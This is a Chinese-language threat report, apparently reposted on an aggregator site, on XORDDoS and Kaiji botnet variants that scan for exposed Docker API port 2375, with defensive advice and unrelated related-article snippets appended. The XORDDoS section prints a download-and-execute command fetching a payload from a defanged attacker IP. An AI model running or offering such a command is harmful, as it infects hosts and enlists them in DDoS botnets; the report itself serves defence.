Linux僵尸网络最新变种现身:Docker服务器惨遭殃及

本文主要是介绍Linux僵尸网络最新变种现身:Docker服务器惨遭殃及,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

研究人员近期发现了2个攻击Docker服务器的Linux僵尸网络的变种,分别是XORDDoS 恶意软件和Kaiji DDoS恶意软件。将Docker 服务器作为目标是XORDDoS和 Kaiji恶意软件的新变化,之前这两款恶意软件的目标是云系统中的Linux 主机。最近Kaiji首次被曝影响物联网设备。攻击者常常使用僵尸网络在扫描了SSH 和Telnet端口后执行暴力破解攻击。这两款恶意软件也搜索了暴露2375 端口的Docker服务器。2375端口是Docker API使用的一个端口,用于非加密或非认证的通信。

这两个恶意软件变种的攻击方法有明显的差异。XORDDoS 攻击会利用Docker服务器来感染服务器上的容器,而Kaiji 攻击会在感染的服务器上部署自己的容器,用于DDoS 恶意软件的安装。

XORDDoS 恶意软件分析

XORDDoS 恶意软件的感染是从攻击者检索暴露Docker API端口(2375)的主机开始的。奇热然后,发送一个命令来列出Docker服务器上的所有容器。然后,攻击者执行以下命令,用XORDDoS 恶意软件来感染所有的容器:

wget hxxp://122[.]51[.]133[.]49:10086/VIP –O VIPchmod 777 VIP./VIP

XORDDoS payload 使用了其他攻击中的XOR key来加密字符串,以及与C2 服务器进行通信。也可以在自己的机器上创建多个副本作为驻留机制。

Linux僵尸网络最新变种现身:Docker服务器惨遭殃及

图 1.  XORDDoS创建多个副本的代码段

Payload会启动SYN、ACK、DNS等DDoS 攻击类型。

Linux僵尸网络最新变种现身:Docker服务器惨遭殃及

图 2. XORDDoS 启动不同类型DDoS攻击的代码段

恶意软件可以下载和执行下一阶段的恶意软件或对自己进行升级。

Linux僵尸网络最新变种现身:Docker服务器惨遭殃及

图 3. 表明XORDDoS下载和升级自己的代码段

恶意软件会收集以下与发起DDoS 攻击相关的数据:

· CPU信息;

· 运行进程的MD5;

· 内存信息;

· 网络速度;

· 运行进程的PID。

需要注意的是XORDDoS 恶意软件变种中的大多数恶意行为都在之前的恶意软件变种中出现过。

研究人员进一步分析攻击者的URL发现,其他恶意软件也攻击过Docker API,比如Dofloo/AESDDoS Linux 僵尸网络的变种Backdoor.Linux.DOFLOO.AB。

Kaiji 恶意软件分析

与 XORDDoS 恶意软件相似,Kaiji 现在的攻击目标也是Docker 服务器。其运营者扫描了网络上暴露了2375 端口的主机。找到目标后,会部署一个伪造的ARM容器来执行Kaiji 二进制文件。

123.sh 脚本会下载和执行恶意软件payload——Linux_arm。之后,脚本会移除DDoS 操作不需要的其他的Linux二进制文件:

Linux僵尸网络最新变种现身:Docker服务器惨遭殃及图 4. 下载和执行123.sh的查询

Linux僵尸网络最新变种现身:Docker服务器惨遭殃及 图 5. 表明移除Linux二进制文件的代码段

Payload linux_arm是Kaiji DDoS 恶意软件会执行以下DDoS 攻击:

· ACK 攻击;

· IPS 欺骗攻击;

· SSH 攻击;

· SYN 攻击;

· SYNACK 攻击;

· TCP 洪泛攻击;

· UDP 洪泛攻击。

恶意软件会收集以下数据,用于前述的攻击中:

· CPU信息;

· 目录;

· 域名;

· 主机IP 地址;

· 运行进程的PID;

· URL 方案。

如何应对?

恶意软件变种背后的攻击者还在不断地对恶意软件进行升级、加入新的功能,因此可以发起针对攻击入口点的攻击。在云端,Docker 服务器越来越多的成为攻击者的目标。因此,研究人员建议采取以下措施来保护Docker 服务器:

· 保护容器主机安全。利用监控工具来确保容器操作系统中的主机容器的安全。

· 保护网络环境安全。使用IPS和web过滤来提供内部和外部流量的可视性。

· 确保管理栈的安全。监控和确保容器注册表的安全,锁定Kubernetes 安装。

最佳实践:

· 遵循推荐的最佳安全实践。

· 使用安全工具来扫描和确保容器安全。

这篇关于Linux僵尸网络最新变种现身:Docker服务器惨遭殃及的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/778992

相关文章

服务器集群同步时间手记

1.时间服务器配置(必须root用户) (1)检查ntp是否安装 [root@node1 桌面]# rpm -qa|grep ntpntp-4.2.6p5-10.el6.centos.x86_64fontpackages-filesystem-1.41-1.1.el6.noarchntpdate-4.2.6p5-10.el6.centos.x86_64 (2)修改ntp配置文件 [r

如何用Docker运行Django项目

本章教程,介绍如何用Docker创建一个Django,并运行能够访问。 一、拉取镜像 这里我们使用python3.11版本的docker镜像 docker pull python:3.11 二、运行容器 这里我们将容器内部的8080端口,映射到宿主机的80端口上。 docker run -itd --name python311 -p

linux-基础知识3

打包和压缩 zip 安装zip软件包 yum -y install zip unzip 压缩打包命令: zip -q -r -d -u 压缩包文件名 目录和文件名列表 -q:不显示命令执行过程-r:递归处理,打包各级子目录和文件-u:把文件增加/替换到压缩包中-d:从压缩包中删除指定的文件 解压:unzip 压缩包名 打包文件 把压缩包从服务器下载到本地 把压缩包上传到服务器(zip

Andrej Karpathy最新采访:认知核心模型10亿参数就够了,AI会打破教育不公的僵局

夕小瑶科技说 原创  作者 | 海野 AI圈子的红人,AI大神Andrej Karpathy,曾是OpenAI联合创始人之一,特斯拉AI总监。上一次的动态是官宣创办一家名为 Eureka Labs 的人工智能+教育公司 ,宣布将长期致力于AI原生教育。 近日,Andrej Karpathy接受了No Priors(投资博客)的采访,与硅谷知名投资人 Sara Guo 和 Elad G

Linux 网络编程 --- 应用层

一、自定义协议和序列化反序列化 代码: 序列化反序列化实现网络版本计算器 二、HTTP协议 1、谈两个简单的预备知识 https://www.baidu.com/ --- 域名 --- 域名解析 --- IP地址 http的端口号为80端口,https的端口号为443 url为统一资源定位符。CSDNhttps://mp.csdn.net/mp_blog/creation/editor

【Python编程】Linux创建虚拟环境并配置与notebook相连接

1.创建 使用 venv 创建虚拟环境。例如,在当前目录下创建一个名为 myenv 的虚拟环境: python3 -m venv myenv 2.激活 激活虚拟环境使其成为当前终端会话的活动环境。运行: source myenv/bin/activate 3.与notebook连接 在虚拟环境中,使用 pip 安装 Jupyter 和 ipykernel: pip instal

秋招最新大模型算法面试,熬夜都要肝完它

💥大家在面试大模型LLM这个板块的时候,不知道面试完会不会复盘、总结,做笔记的习惯,这份大模型算法岗面试八股笔记也帮助不少人拿到过offer ✨对于面试大模型算法工程师会有一定的帮助,都附有完整答案,熬夜也要看完,祝大家一臂之力 这份《大模型算法工程师面试题》已经上传CSDN,还有完整版的大模型 AI 学习资料,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费

ASIO网络调试助手之一:简介

多年前,写过几篇《Boost.Asio C++网络编程》的学习文章,一直没机会实践。最近项目中用到了Asio,于是抽空写了个网络调试助手。 开发环境: Win10 Qt5.12.6 + Asio(standalone) + spdlog 支持协议: UDP + TCP Client + TCP Server 独立的Asio(http://www.think-async.com)只包含了头文件,不依

Linux_kernel驱动开发11

一、改回nfs方式挂载根文件系统         在产品将要上线之前,需要制作不同类型格式的根文件系统         在产品研发阶段,我们还是需要使用nfs的方式挂载根文件系统         优点:可以直接在上位机中修改文件系统内容,延长EMMC的寿命         【1】重启上位机nfs服务         sudo service nfs-kernel-server resta